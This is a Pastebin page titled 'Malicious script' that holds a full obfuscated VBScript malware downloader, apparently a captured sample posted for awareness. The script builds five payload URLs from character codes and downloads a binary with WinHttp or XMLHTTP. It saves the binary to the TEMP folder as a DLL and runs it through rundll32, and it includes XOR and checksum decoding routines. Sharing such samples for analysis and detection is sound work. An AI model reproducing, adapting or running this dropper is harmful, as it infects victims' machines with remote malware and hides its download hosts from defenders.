SHARE
TWEET

Malicious script

dynamoo Oct 27th, 2016 85 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. Const Lb8 = 1, DFm = 2, SUo8 = 8
  3. Const GUc = 1, Yp = 2, TLy = 2
  4. Const Hp0 = "437"
  5. Function VKr1(Mo)
  6. Dim HAq8(255), QXn5, OJj2
  7. HAq8(128)=199
  8. HAq8(129)=252
  9. HAq8(130)=233
  10. HAq8(131)=226
  11. HAq8(132)=228
  12. HAq8(133)=224
  13. HAq8(134)=229
  14. HAq8(135)=231
  15. HAq8(136)=234
  16. HAq8(137)=235
  17. HAq8(138)=232
  18. HAq8(139)=239
  19. HAq8(140)=238
  20. HAq8(141)=236
  21. HAq8(142)=196
  22. HAq8(143)=197
  23. HAq8(144)=201
  24. HAq8(145)=230
  25. HAq8(146)=198
  26. HAq8(147)=244
  27. HAq8(148)=246
  28. HAq8(149)=242
  29. HAq8(150)=251
  30. HAq8(151)=249
  31. HAq8(152)=255
  32. HAq8(153)=214
  33. HAq8(154)=220
  34. HAq8(155)=162
  35. HAq8(156)=163
  36. HAq8(157)=165
  37. HAq8(158)=8359
  38. HAq8(159)=402
  39. HAq8(160)=225
  40. HAq8(161)=237
  41. HAq8(162)=243
  42. HAq8(163)=250
  43. HAq8(164)=241
  44. HAq8(165)=209
  45. HAq8(166)=170
  46. HAq8(167)=186
  47. HAq8(168)=191
  48. HAq8(169)=8976
  49. HAq8(170)=172
  50. HAq8(171)=189
  51. HAq8(172)=188
  52. HAq8(173)=161
  53. HAq8(174)=171
  54. HAq8(175)=187
  55. HAq8(176)=9617
  56. HAq8(177)=9618
  57. HAq8(178)=9619
  58. HAq8(179)=9474
  59. HAq8(180)=9508
  60. HAq8(181)=9569
  61. HAq8(182)=9570
  62. HAq8(183)=9558
  63. HAq8(184)=9557
  64. HAq8(185)=9571
  65. HAq8(186)=9553
  66. HAq8(187)=9559
  67. HAq8(188)=9565
  68. HAq8(189)=9564
  69. HAq8(190)=9563
  70. HAq8(191)=9488
  71. HAq8(192)=9492
  72. HAq8(193)=9524
  73. HAq8(194)=9516
  74. HAq8(195)=9500
  75. HAq8(196)=9472
  76. HAq8(197)=9532
  77. HAq8(198)=9566
  78. HAq8(199)=9567
  79. HAq8(200)=9562
  80. HAq8(201)=9556
  81. HAq8(202)=9577
  82. HAq8(203)=9574
  83. HAq8(204)=9568
  84. HAq8(205)=9552
  85. HAq8(206)=9580
  86. HAq8(207)=9575
  87. HAq8(208)=9576
  88. HAq8(209)=9572
  89. HAq8(210)=9573
  90. HAq8(211)=9561
  91. HAq8(212)=9560
  92. HAq8(213)=9554
  93. HAq8(214)=9555
  94. HAq8(215)=9579
  95. HAq8(216)=9578
  96. HAq8(217)=9496
  97. HAq8(218)=9484
  98. HAq8(219)=9608
  99. HAq8(220)=9604
  100. HAq8(221)=9612
  101. HAq8(222)=9616
  102. HAq8(223)=9600
  103. HAq8(224)=945
  104. HAq8(225)=223
  105. HAq8(226)=915
  106. HAq8(227)=960
  107. HAq8(228)=931
  108. HAq8(229)=963
  109. HAq8(230)=181
  110. HAq8(231)=964
  111. HAq8(232)=934
  112. HAq8(233)=920
  113. HAq8(234)=937
  114. HAq8(235)=948
  115. HAq8(236)=8734
  116. HAq8(237)=966
  117. HAq8(238)=949
  118. HAq8(239)=8745
  119. HAq8(240)=8801
  120. HAq8(241)=177
  121. HAq8(242)=8805
  122. HAq8(243)=8804
  123. HAq8(244)=8992
  124. HAq8(245)=8993
  125. HAq8(246)=247
  126. HAq8(247)=8776
  127. HAq8(248)=176
  128. HAq8(249)=8729
  129. HAq8(250)=183
  130. HAq8(251)=8730
  131. HAq8(252)=8319
  132. HAq8(253)=178
  133. HAq8(254)=9632
  134. HAq8(255)=160
  135. s = ""
  136. For OJj2 = 0 To UBound(Mo)
  137. If Mo(OJj2) < 0 Or Mo(OJj2) > 255 Then
  138. Err.Raise 50003, "", "a2s()", "", 0
  139. ElseIf Mo(OJj2) >= 128 Then
  140. QXn5 = QXn5 & ChrW(HAq8(Mo(OJj2)))
  141. Else
  142. QXn5 = QXn5 & ChrW(Mo(OJj2))
  143. End If
  144. Next
  145. VKr1 = QXn5
  146. End Function
  147. Function Pp3(ISj)
  148. Dim Gg0, TMr3, QXn5
  149. Set Gg0 = CreateObject("ADODB.Stream")
  150. Gg0.type = Yp
  151. Gg0.Charset = Hp0
  152. Gg0.Open
  153. Gg0.LoadFromFile ISj
  154. QXn5 = Gg0.ReadText
  155. Gg0.Close
  156. Pp3 = SOk8(QXn5)
  157. End Function
  158. Sub XTk(ISj, Mo)
  159. Dim Gg0, QXn5
  160. Set Gg0 = CreateObject("ADODB.Stream")
  161. Gg0.type = Yp
  162. Gg0.Charset = Hp0
  163. Gg0.Open
  164. QXn5 = VKr1(Mo)
  165. Gg0.WriteText QXn5
  166. Gg0.SaveToFile ISj, TLy
  167. Gg0.Close
  168. End Sub
  169. Function IQm(Ks)
  170. Dim QXn5, No(0)
  171. If Ks <= 0 Then
  172. Err.Raise 50001, "", "makearrr()", "", 0
  173. ElseIf Ks = 1 Then
  174. IQm = No
  175. Else
  176. QXn5 = Space(Ks-1)
  177. IQm = Split(QXn5, " ")
  178. End If
  179. End Function
  180. Function MCf7(url)
  181. Dim Kf1, Gs, TMr3, OJj2
  182. Dim KCq, Aq9(1)
  183. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  184. Aq9(0) = "WinHttp.WinHttpRequest.5.1"
  185. Aq9(1) = "MSXML2.XMLHTTP"
  186. For Each KCq in Aq9
  187. Err.Clear
  188. Set Gs = CreateObject(KCq)
  189. If Err.Number = 0 Then
  190. Exit For
  191. End If
  192. Next
  193. Gs.Open "GET", url, False
  194. Gs.Send
  195. TMr3 = IQm(LenB(Gs.ResponseBody))
  196. For OJj2 = 1 To LenB(Gs.ResponseBody)
  197. TMr3(OJj2-1) = AscB(MidB(Gs.ResponseBody, OJj2, 1))
  198. Next
  199. MCf7 = TMr3
  200. End Function
  201. Function UPx6()
  202. Dim Ov8, ESx, VBd1
  203. Set Ov8 = CreateObject("WScript.Shell")
  204. Set ESx = Ov8.Environment("System")
  205. VBd1 = ESx("PROCESSOR_ARCHITECTURE")
  206. If LCase(VBd1) = "amd64" Then
  207. UPx6 = Ov8.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  208. Else
  209. UPx6 = Ov8.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  210. End If
  211. End Function
  212. Sub Ye3(VPs, FZb1, Ta7)
  213. Dim Ov8, Kf1, Rp3, Zb0, Bn2
  214. Set Ov8 = CreateObject("WScript.Shell")
  215. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  216. Set Rp3 = Kf1.GetFile(VPs)
  217. Zb0 = Rp3.ShortPath
  218. Bn2 = UPx6() + " " + Zb0 + "," + FZb1 + " " + Ta7
  219. If 2 > 1 Then
  220. Ov8.Run(Bn2)
  221. End If
  222. End Sub
  223. Function DAk9(VPs)
  224. Dim Kf1
  225. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  226. DAk9 = Kf1.FileExists(VPs)
  227. End Function
  228. Function MWp(VPs)
  229. Dim Kf1, Rp3
  230. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  231. Set Rp3 = Kf1.GetFile(VPs)
  232. MWp = Rp3.ShortPath
  233. End Function
  234. Function Ff3(Bg, Mq7)
  235. Dim Ks
  236. Ks = CDbl(Int(CDbl(Bg)/CDbl(Mq7)))
  237. Ff3 = CDbl(Bg) - Ks * CDbl(Mq7)
  238. End Function
  239. Function MIv4(IUj, QXn5)
  240. QXn5(0) = 171 * QXn5(0) Mod 30269
  241. QXn5(1) = 172 * QXn5(1) Mod 30307
  242. QXn5(2) = 170 * QXn5(2) Mod 30323
  243. Dim SOz3
  244. SOz3 = Ff3((CDbl(QXn5(0))/30269.0 + CDbl(QXn5(1))/30307.0 + CDbl(QXn5(2))/30323.0), 1.0)
  245. MIv4 = Int(SOz3 * CDbl(IUj))
  246. End Function
  247. Function Kz5(TMr3, CLn)
  248. Dim Yr(2), DLs6, BVp, Pa0, OJj2
  249. If UBound(TMr3) < 3 Then
  250. Err.Raise 50004, "", "size of array muzt be >= 4", "", 0
  251. End If
  252. DLs6 = IQm(UBound(TMr3) - 3)
  253. Yr(0) = CLn(0)
  254. Yr(1) = CLn(1)
  255. Yr(2) = CLn(2)
  256. For OJj2 = 0 To UBound(TMr3)
  257. TMr3(OJj2) = TMr3(OJj2) Xor MIv4(256, Yr)
  258. Next
  259. BVp = TMr3(UBound(TMr3)-3)+(TMr3(UBound(TMr3)-2)*256)+(TMr3(UBound(TMr3)-1)*256*256)+(TMr3(UBound(TMr3))*256*256*256)
  260. Pa0 = ZBk2
  261. For OJj2 = 0 To UBound(DLs6)
  262. DLs6(OJj2) = TMr3(OJj2)
  263. Pa0 = (Pa0 + TMr3(OJj2)) Mod 1000000000
  264. Next
  265. If Pa0 <> BVp Then
  266. Err.Raise 50005, "", "checksum error", "", 0
  267. End If
  268. Kz5 = DLs6
  269. End Function
  270. Function LLq(Ke4)
  271. LLq = CInt(Ke4*Rnd())
  272. End Function
  273. Sub RTr1(Dc)
  274. WScript.Sleep(Dc)
  275. End Sub
  276. Randomize
  277. Dim WAz(2), ZBk2, YAz(4), ISj
  278. WAz(0) = 25482
  279. WAz(1) = 2072
  280. WAz(2) = 22148
  281. ZBk2 = 32
  282. YAz(0)=cHr(104) & cHr(116) + cHr(116) & cHr(112) + cHr(58) + cHr(47) + cHr(47) + cHr(97) + "c" + cHr(116) & cHr(105) + cHr(111) & cHr(110) & cHr(111) & cHr(110) + cHr(115) & "p" & cHr(111) + cHr(114) + cHr(116) & cHr(115) + cHr(46) & cHr(99) + cHr(111) & cHr(109) & cHr(47) + cHr(107) + cHr(113) + "0" + cHr(117) + "9" + "3" & cHr(97) + cHr(49)
  283. YAz(1)=cHr(104) + "t" + cHr(116) & "p" + cHr(58) + "/" & cHr(47) + cHr(100) & cHr(109) & cHr(116) & cHr(121) & cHr(97) + cHr(46) + cHr(114) + "u" + cHr(47) + cHr(109) + cHr(112) & "o" + "z" + cHr(99) & "e" + cHr(117)
  284. YAz(2)="h" & cHr(116) + cHr(116) & "p" + cHr(58) + "/" + cHr(47) + cHr(99) + "a" & cHr(108) & cHr(108) + cHr(105) & cHr(100) + "e" & "o" & cHr(46) + cHr(102) + cHr(114) & cHr(47) & "m" + cHr(115) + "n" + "9" & "a" + cHr(114)
  285. YAz(3)=cHr(104) & cHr(116) & cHr(116) & cHr(112) + cHr(58) & cHr(47) + cHr(47) & cHr(102) & cHr(108) & cHr(117) & cHr(116) + cHr(121) & "g" & "o" & cHr(121) + cHr(46) & cHr(110) & cHr(101) + cHr(116) + cHr(47) & cHr(56) + cHr(50) & cHr(111) + cHr(107) + "z" + cHr(122) + cHr(107) & cHr(113)
  286. YAz(4)=cHr(104) + cHr(116) + "t" + "p" & cHr(58) & cHr(47) + "/" + cHr(116) + "h" + "e" + cHr(97) + cHr(116) + cHr(111) + "s" + cHr(99) + cHr(46) & cHr(110) + cHr(101) & cHr(116) + cHr(47) + cHr(56) + cHr(106) + cHr(51) & cHr(119) & cHr(109)
  287. ISj = "e134dkdCXFS"
  288. Dim Ov8, Yl8, TKh, Rd
  289. Set objShell = CreateObject("WScript.Shell")
  290. Yl8 = objShell.ExpandEnvironmentStrings("%" & "TEMP%")
  291. TKh = Yl8 & "\" & ISj & ".dll"
  292. Dim VZx1, EYi7, Bd, Hp, OJj2
  293. EYi7 = False
  294. For OJj2=0 To 10: Do
  295. If DAk9(TKh) Then
  296. Rd = MWp(TKh) & ".txt"
  297. If DAk9(Rd) Then
  298. WScript.Quit(0)
  299. End If
  300. End If
  301. If Not EYi7 Then
  302. VZx1 = LLq(UBound(YAz))
  303. Bd = MCf7(YAz(VZx1))
  304. If Err.Number <> 0 Then
  305. Exit Do
  306. End If
  307. Hp = Bd  ' Kz5(Bd, WAz)
  308. If Err.Number <> 0 Then
  309. Exit Do
  310. End If
  311. XTk TKh, Hp
  312. If Err.Number <> 0 Then
  313. Exit Do
  314. End If
  315. EYi7 = True
  316. End If
  317. Ye3 TKh, "EnhancedStoragePasswordConfig", "147"
  318. RTr1 24999
  319. Loop While False: Next
  320. If 2=2 Then
  321. WScript.Quit(1)
  322. End If
RAW Paste Data
Top